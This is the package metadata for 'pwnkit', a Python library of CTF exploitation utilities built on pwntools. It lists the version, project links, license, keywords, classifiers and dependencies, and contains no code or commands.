Metadata-Version: 2.4
Name: pwnkit
Version: 0.2.20
Summary: Axura's reusable pwn utilities, gadgets, debugging, shellcodes, templates
Project-URL: Homepage, https://4xura.com
Project-URL: Repository, https://github.com/4xura/pwnkit
Project-URL: Issues, https://github.com/4xura/pwnkit/issues
Project-URL: Changelog, https://github.com/4xura/pwnkit/releases
Author-email: Axura <asuraulord@gmail.com>
License: MIT License
License-File: LICENSE
Keywords: ctf,exploit,heap,pwn,pwntools,rop,stack,template
Classifier: Development Status :: 3 - Alpha
Classifier: Environment :: Console
Classifier: Intended Audience :: Developers
Classifier: Intended Audience :: Information Technology
Classifier: License :: OSI Approved :: MIT License
Classifier: Programming Language :: Python :: 3
Classifier: Programming Language :: Python :: 3 :: Only
Classifier: Programming Language :: Python :: 3.8
Classifier: Programming Language :: Python :: 3.9
Classifier: Programming Language :: Python :: 3.10
Classifier: Programming Language :: Python :: 3.11
Classifier: Programming Language :: Python :: 3.12
Classifier: Topic :: Security
Classifier: Topic :: Software Development :: Libraries
Requires-Python: >=3.8
Requires-Dist: pwntools>=4.11.0
Requires-Dist: typing-extensions>=4.10.0; python_version < '3.11'
Provides-Extra: dev
Requires-Dist: pytest; extra == 'dev'
